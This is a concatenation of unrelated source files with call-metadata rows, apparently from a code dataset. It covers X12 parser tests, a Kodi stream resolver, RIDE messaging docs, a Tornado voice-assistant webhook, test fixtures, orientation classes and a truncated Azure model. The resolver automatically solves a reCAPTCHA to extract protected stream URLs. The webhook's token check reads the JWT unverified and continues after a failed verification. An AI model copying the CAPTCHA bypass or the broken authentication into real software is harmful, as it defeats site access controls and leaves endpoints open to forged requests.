for datatree in src.iter_segments('GS_LOOP'):
if datatree.id == 'GS_LOOP':
for sub in datatree.select('ST_LOOP/DETAIL/2000A/2000B/2300/2400'):
self.assertEqual(sub.id, '2400')
ct += 1
self.assertEqual(
ct, 6, 'Found %i 2400 loops. Should have %i' % (ct, 6))
class TreeSelectFromSegment(X12fileTestCase):
def test_select_from_seg_fail(self):
fd = self._makeFd(datafiles['835id']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in src.iter_segments('ST_LOOP'):
if datatree.id == 'GS':
#self.assertFalseRaises(AttributeError, datatree.select, 'DETAIL/2000/2100')
for claim in datatree.select('DETAIL/2000/2100'):
pass
class TreeAddSegment(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
seg_data = pyx12.segment.Segment('HCP*00*7.11~', '~', '*', ':')
new_node = self.loop2300.add_segment(seg_data)
self.assertNotEqual(new_node, None)
def test_add_new_id(self):
seg_data = pyx12.segment.Segment('REF*F5*6.11~', '~', '*', ':')
new_node = self.loop2300.add_segment(seg_data)
self.assertNotEqual(new_node, None)
def test_add_new_not_exists(self):
seg_data = pyx12.segment.Segment('ZZZ*00~', '~', '*', ':')
self.assertRaises(pyx12.errors.X12PathError,
self.loop2300.add_segment, seg_data)
class TreeAddSegmentString(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
new_node = self.loop2300.add_segment('HCP*00*7.11~')
self.assertNotEqual(new_node, None)
def test_add_new_id(self):
new_node = self.loop2300.add_segment('REF*F5*6.11')
self.assertNotEqual(new_node, None)
def test_add_new_not_exists(self):
self.assertRaises(pyx12.errors.X12PathError,
self.loop2300.add_segment, 'ZZZ*00~')
class SegmentExists(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
self.param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_qual_segment(self):
self.assertTrue(self.loop2300.exists('2310B'))
self.assertTrue(self.loop2300.exists('2310B/NM1[82]'))
for loop2310b in self.loop2300.select('2310B'):
self.assertTrue(loop2310b.exists('NM1'))
self.assertTrue(loop2310b.exists('NM1[82]'))
def test_qual_segment_sub_loop(self):
self.assertTrue(self.loop2300.exists('2400/2430'))
self.assertTrue(self.loop2300.exists('2400/2430/DTP[573]'))
self.assertFalse(self.loop2300.exists('2400/2430/DTP[111]'))
self.assertTrue(self.loop2300.exists('2400/2430/DTP[573]03'))
def test_qual_segment_select_sub_loop(self):
loop2430 = self.loop2300.first('2400/2430')
self.assertTrue(loop2430.exists('DTP'))
self.assertTrue(loop2430.exists('DTP[573]'))
self.assertTrue(loop2430.exists('DTP[573]03'))
def test_qual_834_dtp(self):
fd = self._makeFd(datafiles['834_lui_id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertTrue(loop2300.exists('DTP[348]'))
self.assertFalse(loop2300.exists('DTP[349]'))
class TreeAddLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
seg_data = pyx12.segment.Segment(
'NM1*82*2*Provider 1*****ZZ*9898798~', '~', '*', ':')
new_node = self.loop2300.add_loop(seg_data)
self.assertNotEqual(new_node, None)
self.assertTrue(self.loop2300.exists('2310B'))
for loop2310b in self.loop2300.select('2310B'):
self.assertTrue(loop2310b.exists('NM1'))
self.assertTrue(loop2310b.exists('NM1[82]'))
def test_add_new_string_seg(self):
old_ct = self.loop2300.count('2400')
new_node = self.loop2300.add_loop('LX*5~')
self.assertNotEqual(new_node, None)
self.assertTrue(self.loop2300.exists('2400'))
self.assertEqual(old_ct + 1, self.loop2300.count('2400'))
for loop2400 in self.loop2300.select('2400'):
self.assertTrue(loop2400.exists('LX'))
class TreeAddLoopDetail(X12fileTestCase):
def test_add_loops_under_detail(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&BE&ZZ000&ZZ001&20030828&1128&17&X&004010X095A1+\n'
str1 += 'ST&834&11280001+\n'
str1 += 'BGN&+\n'
str1 += 'INS&Y&18&30&XN&AE&RT+\n'
str1 += 'SE&4&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
fd = self._makeFd(str1)
errors = []
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(param, errh, fd)
for st_loop in src.iter_segments('ST_LOOP'):
if st_loop.id == 'ST_LOOP' and st_loop.exists('DETAIL'):
detail = st_loop.first('DETAIL')
self.assertTrue(detail.exists('2000'))
detail.first('2000').delete()
self.assertFalse(detail.exists('2000'))
detail.add_loop('INS&Y&18&30&XN&AE&RT+')
self.assertTrue(detail.exists('2000'))
class TreeAddNode(X12fileTestCase):
def setUp(self):
self.param = pyx12.params.params()
def test_add_loop(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertEqual(self._get_count(loop2300, '2400'), 2)
for node in loop2300.select('2400'):
loop2300.add_node(node)
self.assertEqual(self._get_count(loop2300, '2400'), 4)
def test_add_segment(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertEqual(self._get_count(loop2300, 'CN1'), 1)
for node in loop2300.select('CN1'):
loop2300.add_node(node)
self.assertEqual(self._get_count(loop2300, 'CN1'), 2)
def test_fail(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
for node in loop2300.select('CN1'):
cn1 = node
break
n2400 = None
for node in loop2300.select('2400'):
n2400 = node
break
assert n2400 is not None, 'Loop 2400 was not matched'
self.assertRaises(pyx12.errors.X12PathError, n2400.add_node, cn1)
def _get_count(self, node, loop_id):
ct = 0
for n in node.select(loop_id):
ct += 1
return ct
class CountRepeatingLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300' and datatree.get_value('CLM01') == '5555':
self.loop2300 = datatree
break
def test_repeat_2400(self):
ct = 0
for loop_2400 in self.loop2300.select('2400'):
ct += 1
self.assertEqual(
ct, 3, 'Found %i 2400 loops. Should have %i' % (ct, 3))
def test_repeat_2430(self):
ct = 0
for loop_2430 in self.loop2300.select('2400/2430'):
ct += 1
self.assertEqual(
ct, 0, 'Found %i 2430 loops. Should have %i' % (ct, 0))
class IterateTree(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
def test_iterate_all(self):
ct_2000a = 0
ct_other = 0
for datatree in self.src.iter_segments('2000A'):
if datatree.id == '2000A':
ct_2000a += 1
else:
ct_other += 1
self.assertEqual(ct_2000a, 1,
'Found %i 2000A loops. Should have %i' % (ct_2000a, 1))
self.assertEqual(ct_other, 11, 'Found %i external segments. Should have %i' % (ct_other, 11))
class TreeDeleteSegment(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
assert self.loop2300.get_value('CN101') == '05'
seg_data = pyx12.segment.Segment('CN1*05~', '~', '*', ':')
self.assertTrue(self.loop2300.delete_segment(seg_data))
self.assertEqual(self.loop2300.get_value('CN101'), None)
def test_delete_fail(self):
seg_data = pyx12.segment.Segment('HCP*00*7.11~', '~', '*', ':')
self.assertFalse(self.loop2300.delete_segment(seg_data))
class TreeDeleteLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
self.assertEqual(self.loop2300.get_value('2400/LX01'), '1')
self.assertTrue(self.loop2300.delete_node('2400'))
self.assertEqual(self.loop2300.get_value('2400/LX01'), '2')
def test_delete_fail(self):
self.assertFalse(self.loop2300.delete_node('2500'))
class NodeDeleteSelf(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
cn1 = self.loop2300.first('CN1')
assert cn1.id == 'CN1'
cn1.delete()
try:
a = cn1.id
except EngineError:
pass
except:
a = cn1.id
#self.assertRaises(EngineError, cn1.id)
class TreeCopy(X12fileTestCase):
def setUp(self):
self.param = pyx12.params.params()
def test_add_node(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2100'):
if datatree.id == '2100':
for svc in datatree.select('2110'):
new_svc = svc.copy()
new_svc.set_value('SVC01', 'XX:AAAAA')
self.assertTrue(not svc is new_svc)
datatree.add_node(new_svc)
#for svc in datatree.select('2110'):
# print svc.get_value('SVC01')
break
def test_copy_seg(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2100'):
if datatree.id == '2100':
for svc in datatree.select('2110'):
new_svc = svc.copy()
self.assertFalse(svc is new_svc)
self.assertEqual(svc.get_value('SVC01'),
new_svc.get_value('SVC01'))
new_svc.set_value('SVC01', 'XX:AAAAA')
self.assertFalse(svc is new_svc)
self.assertNotEqual(svc.get_value('SVC01'),
new_svc.get_value('SVC01'))
break
| [((22, 21, 22, 37), 'io.StringIO', 'StringIO', ({(22, 30, 22, 36): 'x12str'}, {}), '(x12str)', False, 'from io import StringIO\n'), ((24, 21, 24, 31), 'io.StringIO', 'StringIO', ({}, {}), '()', False, 'from io import StringIO\n'), ((27, 21, 27, 55), 'io.StringIO', 'StringIO', (), '', False, 'from io import StringIO\n'), ((29, 21, 29, 47), 'io.StringIO', 'StringIO', (), '', False, 'from io import StringIO\n')] |
Hades01/Addons | repo/script.module.liveresolver/lib/liveresolver/resolvers/finecast.py | 710da97ac850197498a3cd64be1811c593610add | # -*- coding: utf-8 -*-
import re,urlparse,cookielib,os,urllib
from liveresolver.modules import client,recaptcha_v2,control,constants, decryptionUtils
from liveresolver.modules.log_utils import log
cookieFile = os.path.join(control.dataPath, 'finecastcookie.lwp')
def resolve(url):
#try:
try:
referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except:
referer=url
id = urlparse.parse_qs(urlparse.urlparse(url).query)['u'][0]
cj = get_cj()
url = 'http://www.finecast.tv/embed4.php?u=%s&vw=640&vh=450'%id
rs = client.request(url,referer=referer,cj=cj)
sitekey = re.findall('data-sitekey="([^"]+)', rs)[0]
token = recaptcha_v2.UnCaptchaReCaptcha().processCaptcha(sitekey, lang='de')
#1:04
    result = client.request(url, post=urllib.urlencode(token), referer=referer)
log(result)
file = re.findall('[\'\"](.+?.stream)[\'\"]',result)[0]
auth = re.findall('[\'\"](\?wmsAuthSign.+?)[\'\"]',result)[0]
rtmp = 'http://play.finecast.tv:1935/live/%s/playlist.m3u8%s'%(file,auth)
return rtmp
#except:
# return
def get_cj():
cookieJar=None
try:
cookieJar = cookielib.LWPCookieJar()
cookieJar.load(cookieFile,ignore_discard=True)
except:
cookieJar=None
if not cookieJar:
cookieJar = cookielib.LWPCookieJar()
return cookieJar | [((7, 13, 7, 65), 'os.path.join', 'os.path.join', ({(7, 26, 7, 42): 'control.dataPath', (7, 44, 7, 64): '"""finecastcookie.lwp"""'}, {}), "(control.dataPath, 'finecastcookie.lwp')", False, 'import re, urlparse, cookielib, os, urllib\n'), ((20, 13, 20, 54), 'liveresolver.modules.client.request', 'client.request', (), '', False, 'from liveresolver.modules import client, recaptcha_v2, control, constants, decryptionUtils\n'), ((25, 8, 25, 19), 'liveresolver.modules.log_utils.log', 'log', ({(25, 12, 25, 18): 'result'}, {}), '(result)', False, 'from liveresolver.modules.log_utils import log\n'), ((21, 18, 21, 57), 're.findall', 're.findall', ({(21, 29, 21, 52): '"""data-sitekey="([^"]+)"""', (21, 54, 21, 56): 'rs'}, {}), '(\'data-sitekey="([^"]+)\', rs)', False, 'import re, urlparse, cookielib, os, urllib\n'), ((27, 15, 27, 60), 're.findall', 're.findall', ({(27, 26, 27, 52): '"""[\'"](.+?.stream)[\'"]"""', (27, 53, 27, 59): 'result'}, {}), '(\'[\\\'"](.+?.stream)[\\\'"]\', result)', False, 'import re, urlparse, cookielib, os, urllib\n'), ((28, 15, 28, 66), 're.findall', 're.findall', ({(28, 26, 28, 58): '"""[\'"](\\\\?wmsAuthSign.+?)[\'"]"""', (28, 59, 28, 65): 'result'}, {}), '(\'[\\\'"](\\\\?wmsAuthSign.+?)[\\\'"]\', result)', False, 'import re, urlparse, cookielib, os, urllib\n'), ((41, 20, 41, 44), 'cookielib.LWPCookieJar', 'cookielib.LWPCookieJar', ({}, {}), '()', False, 'import re, urlparse, cookielib, os, urllib\n'), ((47, 20, 47, 44), 'cookielib.LWPCookieJar', 'cookielib.LWPCookieJar', ({}, {}), '()', False, 'import re, urlparse, cookielib, os, urllib\n'), ((22, 16, 22, 49), 'liveresolver.modules.recaptcha_v2.UnCaptchaReCaptcha', 'recaptcha_v2.UnCaptchaReCaptcha', ({}, {}), '()', False, 'from liveresolver.modules import client, recaptcha_v2, control, constants, decryptionUtils\n'), ((24, 42, 24, 65), 'urllib.urlencode', 'urllib.urlencode', ({(24, 59, 24, 64): 'token'}, {}), '(token)', False, 'import re, urlparse, cookielib, os, urllib\n'), ((17, 31, 17, 53), 'urlparse.urlparse', 'urlparse.urlparse', ({(17, 49, 17, 52): 'url'}, {}), '(url)', False, 'import re, urlparse, cookielib, os, urllib\n'), ((12, 40, 12, 62), 'urlparse.urlparse', 'urlparse.urlparse', ({(12, 58, 12, 61): 'url'}, {}), '(url)', False, 'import re, urlparse, cookielib, os, urllib\n')] |
crylearner/RIDE3X | src/robotide/publish/__init__.py | 767f45b0c908f18ecc7473208def8dc7489f43b0 | # Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Message publishing and subscribing.
.. contents::
:depth: 2
:local:
Introduction
------------
RIDE uses messages for communication when something of interest happens, for
example a suite is loaded or an item is selected in the tree. This module provides
means both for subscribing to listen to those messages and for sending them.
Messages are used for communication between the different components of the
core application, but their main usage is notifying plugins about various events.
Plugins can also send messages themselves, and also create custom messages, if
they have a need.
Subscribing
-----------
The core application uses the global `PUBLISHER` object (an instance of the
`Publisher` class) for subscribing to and unsubscribing from the messages.
Plugins should use the helper methods of the `Plugin` class instead of using
the `PUBLISHER` directly.
Message topics
~~~~~~~~~~~~~~
Regardless of the method, subscribing to messages requires a message topic.
Topics can be specified using the actual message classes in
`robotide.publish.messages` module or with their dot separated topic strings.
It is, for example, equivalent to use the `RideTreeSelection` class and a
string ``ride.tree.selection``. Topic strings can normally, but not always, be
mapped directly to the class names.
The topic strings represent a hierarchy where the dots separate the hierarchy
levels. All messages with a topic at or below the given level will match the
subscribed topic. For example, subscribing to the ``ride.notebook`` topic means
that `RideNotebookTabChanged` or any other message with a topic starting with
``ride.notebook`` will match.
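For example, the following two subscriptions would be equivalent (an
illustrative sketch using the plugin helper method shown in the next section)::
    self.subscribe(self.OnTreeSelection, RideTreeSelection)
    self.subscribe(self.OnTreeSelection, 'ride.tree.selection')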
Listeners
~~~~~~~~~
Another thing needed when subscribing is a listener, which must be a callable
accepting one argument. When the corresponding message is published, the listener
will be called with an instance of the message class as an argument. That instance
contains the topic and possibly some additional information in its attributes.
The following example demonstrates how a plugin can subscribe to an event.
In this example the ``OnTreeSelection`` method is the listener and the
``message`` it receives is an instance of the `RideTreeSelection` class.
::
from robotide.pluginapi import Plugin, RideTreeSelection
class MyFancyPlugin(Plugin):
def activate(self):
self.subscribe(self.OnTreeSelection, RideTreeSelection)
def OnTreeSelection(self, message):
print message.topic, message.node
Unsubscribing
~~~~~~~~~~~~~
Unsubscribing from a single message requires passing the same topic and listener
to the unsubscribe method that were used for subscribing. Additionally, both
the `PUBLISHER` object and the `Plugin` class provide a method for unsubscribing
all listeners registered by someone.
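For example, the plugin shown above could later stop listening for tree
selections like this (a sketch, assuming the ``unsubscribe`` helper mirrors the
``subscribe`` call used earlier)::
    self.unsubscribe(self.OnTreeSelection, RideTreeSelection)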
Publishing messages
-------------------
Both the core application and plugins can publish messages using message
classes in the `publish.messages` module directly. Sending a message is as easy
as creating an instance of the class and calling its ``publish`` method. What
parameters are needed when the instance is created depends on the message.
Custom messages
~~~~~~~~~~~~~~~
Most of the messages in the `publish.messages` module are to be sent only by
the core application. If plugins need their own messages, for example for
communication between different plugins, they can easily create custom messages
by extending the `RideMessage` base class::
from robotide.pluginapi import Plugin, RideMessage
class FancyImportantMessage(RideMessage):
data = ['importance']
class MyFancyPlugin(Plugin):
def important_action(self):
# some code ...
            FancyImportantMessage(importance='HIGH').publish()
Plugins interested in this message can subscribe to it using either
the class ``FancyImportantMessage`` or its automatically generated title
``fancy.important``. Notice also that all the messages are exposed through
the `robotide.pluginapi` module and plugins should import them there.
"""
import os
from robotide.context import WX_VERSION
if WX_VERSION > '3.0':
from wx.lib.pubsub import setuparg1
elif WX_VERSION > '2.9':
from wx.lib.pubsub import setupv1
from .messages import *
from .publisher import PUBLISHER
def get_html_message(name):
return open(os.path.join(
os.path.dirname(__file__), 'html', '{}.html'.format(name))).read()
| [((133, 8, 133, 33), 'os.path.dirname', 'os.path.dirname', ({(133, 24, 133, 32): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
pizzapanther/google-actions-python-example | app.py | 40d13fc1821e1e11f15cc7413571cb5bd6327024 | #!/usr/bin/env python
import os
import json
import tornado.ioloop
import tornado.log
import tornado.web
from google.oauth2 import id_token
from google.auth.transport import requests as google_requests
import jwt
import requests
API_KEY = os.environ.get('OPEN_WEATHER_MAP_KEY', None)
PROJECT_ID = os.environ.get('PROJECT_ID', None)
class WeatherHandler(tornado.web.RequestHandler):
def start_conversation (self):
response = {
'expectUserResponse': True,
'expectedInputs': [
{
'possibleIntents': {'intent': 'actions.intent.TEXT'},
'inputPrompt': {
'richInitialPrompt': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>What city would you like the weather for?</speak>'
}
}
]
}
}
}
]
}
self.set_header("Content-Type", 'application/json')
self.set_header('Google-Assistant-API-Version', 'v2')
self.write(json.dumps(response, indent=2))
def get_weather (self, city):
api_response = requests.get(
'http://api.openweathermap.org/data/2.5/weather',
params={'q': city, 'APPID': API_KEY}
)
data = api_response.json()
if 'main' not in data:
response = {
'expectUserResponse': False,
'finalResponse': {
'richResponse': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>City not found - meow!</speak>'
}
}
]
}
}
}
else:
      # Convert the temperature from Kelvin to Fahrenheit
      temp = round(1.8 * (data['main']['temp'] - 273) + 32)
response = {
'expectUserResponse': False,
'finalResponse': {
'richResponse': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>The temperature in {} is {} degrees.</speak>'.format(city, temp)
}
}
]
}
}
}
self.set_header("Content-Type", 'application/json')
self.set_header('Google-Assistant-API-Version', 'v2')
self.write(json.dumps(response, indent=2))
def get (self):
city = self.get_query_argument('city', '')
if city:
self.get_weather(city)
else:
self.start_conversation()
def post (self):
token = self.request.headers.get("Authorization")
    # Decode without verifying the signature first, just to inspect the audience claim
    jwt_data = jwt.decode(token, verify=False)
if jwt_data['aud'] != PROJECT_ID:
self.set_status(401)
self.write('Token Mismatch')
else:
request = google_requests.Request()
try:
# Makes external request, remove if not needed to speed things up
id_info = id_token.verify_oauth2_token(token, request, PROJECT_ID)
except:
self.set_status(401)
self.write('Token Mismatch')
data = json.loads(self.request.body.decode('utf-8'))
intent = data['inputs'][0]['intent']
print(intent)
print(data['conversation']['conversationId'])
if intent == 'actions.intent.MAIN':
self.start_conversation()
else:
city = data['inputs'][0]['arguments'][0]['textValue']
self.get_weather(city)
def make_app():
return tornado.web.Application([
(r"/weather-app", WeatherHandler),
], autoreload=True)
if __name__ == "__main__":
tornado.log.enable_pretty_logging()
app = make_app()
app.listen(int(os.environ.get('PORT', '8000')))
tornado.ioloop.IOLoop.current().start()
| [((16, 10, 16, 54), 'os.environ.get', 'os.environ.get', ({(16, 25, 16, 47): '"""OPEN_WEATHER_MAP_KEY"""', (16, 49, 16, 53): 'None'}, {}), "('OPEN_WEATHER_MAP_KEY', None)", False, 'import os\n'), ((17, 13, 17, 47), 'os.environ.get', 'os.environ.get', ({(17, 28, 17, 40): '"""PROJECT_ID"""', (17, 42, 17, 46): 'None'}, {}), "('PROJECT_ID', None)", False, 'import os\n'), ((46, 19, 49, 5), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((99, 15, 99, 46), 'jwt.decode', 'jwt.decode', (), '', False, 'import jwt\n'), ((43, 15, 43, 45), 'json.dumps', 'json.dumps', (), '', False, 'import json\n'), ((87, 15, 87, 45), 'json.dumps', 'json.dumps', (), '', False, 'import json\n'), ((105, 16, 105, 41), 'google.auth.transport.requests.Request', 'google_requests.Request', ({}, {}), '()', True, 'from google.auth.transport import requests as google_requests\n'), ((134, 17, 134, 47), 'os.environ.get', 'os.environ.get', ({(134, 32, 134, 38): '"""PORT"""', (134, 40, 134, 46): '"""8000"""'}, {}), "('PORT', '8000')", False, 'import os\n'), ((108, 18, 108, 74), 'google.oauth2.id_token.verify_oauth2_token', 'id_token.verify_oauth2_token', ({(108, 47, 108, 52): 'token', (108, 54, 108, 61): 'request', (108, 63, 108, 73): 'PROJECT_ID'}, {}), '(token, request, PROJECT_ID)', False, 'from google.oauth2 import id_token\n')] |
EVEprosper/ProsperCookiecutters | ProsperFlask/{{cookiecutter.project_name}}/tests/conftest.py | 569ca0c311a5ead2b49f0cdde4cb2ad14dcd3a2c | # AUTOGENERATED BY: ProsperCookiecutters/ProsperFlask
# TEMPLATE VERSION: {{cookiecutter.template_version}}
# AUTHOR: {{cookiecutter.author_name}}
"""PyTest fixtures and modifiers"""
import pytest
from {{cookiecutter.library_name}}.endpoints import APP
@pytest.fixture
def app():
"""flask test hook for dry-running Flask code"""
return APP
| [] |
RealOrangeOne/yuri | zoloto/coords.py | 6ed55bdf97c6add22cd6c71c39ca30e2229337cb | from typing import Iterator, NamedTuple, Tuple
from cached_property import cached_property
from cv2 import Rodrigues
from pyquaternion import Quaternion
class Coordinates(NamedTuple):
"""
:param float x: X coordinate
:param float y: Y coordinate
"""
x: float
y: float
class ThreeDCoordinates(NamedTuple):
"""
:param float x: X coordinate
:param float y: Y coordinate
:param float z: Z coordinate
"""
x: float
y: float
z: float
class Spherical(NamedTuple):
"""
:param float rot_x: Rotation around the X-axis, in radians
:param float rot_y: Rotation around the Y-axis, in radians
:param float dist: Distance
"""
rot_x: float
rot_y: float
dist: int
ThreeTuple = Tuple[float, float, float]
RotationMatrix = Tuple[ThreeTuple, ThreeTuple, ThreeTuple]
class Orientation:
"""The orientation of an object in 3-D space."""
def __init__(self, e_x: float, e_y: float, e_z: float):
"""
Construct a quaternion given the components of a rotation vector.
More information: https://w.wiki/Fci
"""
rotation_matrix, _ = Rodrigues((e_x, e_y, e_z))
self._quaternion = Quaternion(matrix=rotation_matrix)
@property
def rot_x(self) -> float:
"""Get rotation angle around x axis in radians."""
return self.roll
@property
def rot_y(self) -> float:
"""Get rotation angle around y axis in radians."""
return self.pitch
@property
def rot_z(self) -> float:
"""Get rotation angle around z axis in radians."""
return self.yaw
@property
def yaw(self) -> float:
"""Get rotation angle around z axis in radians."""
return self.yaw_pitch_roll[0]
@property
def pitch(self) -> float:
"""Get rotation angle around y axis in radians."""
return self.yaw_pitch_roll[1]
@property
def roll(self) -> float:
"""Get rotation angle around x axis in radians."""
return self.yaw_pitch_roll[2]
@cached_property
def yaw_pitch_roll(self) -> ThreeTuple:
"""
Get the equivalent yaw-pitch-roll angles.
Specifically intrinsic Tait-Bryan angles following the z-y'-x'' convention.
"""
return self._quaternion.yaw_pitch_roll
def __iter__(self) -> Iterator[float]:
"""
Get an iterator over the rotation angles.
Returns:
An iterator of floating point angles in order x, y, z.
"""
return iter([self.rot_x, self.rot_y, self.rot_z])
@cached_property
def rotation_matrix(self) -> RotationMatrix:
"""
Get the rotation matrix represented by this orientation.
Returns:
A 3x3 rotation matrix as a tuple of tuples.
"""
r_m = self._quaternion.rotation_matrix
return (
(r_m[0][0], r_m[0][1], r_m[0][2]),
(r_m[1][0], r_m[1][1], r_m[1][2]),
(r_m[2][0], r_m[2][1], r_m[2][2]),
)
@property
def quaternion(self) -> Quaternion:
"""Get the quaternion represented by this orientation."""
return self._quaternion
def __repr__(self) -> str:
return "Orientation(rot_x={},rot_y={},rot_z={})".format(
self.rot_x, self.rot_y, self.rot_z
)
| [((55, 29, 55, 55), 'cv2.Rodrigues', 'Rodrigues', ({(55, 39, 55, 54): '(e_x, e_y, e_z)'}, {}), '((e_x, e_y, e_z))', False, 'from cv2 import Rodrigues\n'), ((56, 27, 56, 61), 'pyquaternion.Quaternion', 'Quaternion', (), '', False, 'from pyquaternion import Quaternion\n')] |
JonathanGailliez/azure-sdk-for-python | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/bms_container_query_object.py | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class BMSContainerQueryObject(Model):
"""The query filters that can be used with the list containers API.
All required parameters must be populated in order to send to Azure.
:param backup_management_type: Required. Backup management type for this
container. Possible values include: 'Invalid', 'AzureIaasVM', 'MAB',
'DPM', 'AzureBackupServer', 'AzureSql', 'AzureStorage', 'AzureWorkload',
'DefaultBackup'
:type backup_management_type: str or
~azure.mgmt.recoveryservicesbackup.models.BackupManagementType
:param container_type: Type of container for filter. Possible values
include: 'Invalid', 'Unknown', 'IaasVMContainer',
'IaasVMServiceContainer', 'DPMContainer', 'AzureBackupServerContainer',
'MABContainer', 'Cluster', 'AzureSqlContainer', 'Windows', 'VCenter',
'VMAppContainer', 'SQLAGWorkLoadContainer', 'StorageContainer',
'GenericContainer', 'SqlCluster', 'ExchangeDAG', 'SharepointFarm',
'HyperVCluster', 'WindowsClient'
:type container_type: str or
~azure.mgmt.recoveryservicesbackup.models.ContainerType
:param backup_engine_name: Backup engine name
:type backup_engine_name: str
:param fabric_name: Fabric name for filter
:type fabric_name: str
:param status: Status of registration of this container with the Recovery
Services Vault.
:type status: str
:param friendly_name: Friendly name of this container.
:type friendly_name: str
"""
_validation = {
'backup_management_type': {'required': True},
}
_attribute_map = {
'backup_management_type': {'key': 'backupManagementType', 'type': 'str'},
'container_type': {'key': 'containerType', 'type': 'str'},
'backup_engine_name': {'key': 'backupEngineName', 'type': 'str'},
'fabric_name': {'key': 'fabricName', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
}
def __init__(self, **kwargs):
super(BMSContainerQueryObject, self).__init__(**kwargs)
self.backup_management_type = kwargs.get('backup_management_type', None)
self.container_type = kwargs.get('container_type', None)
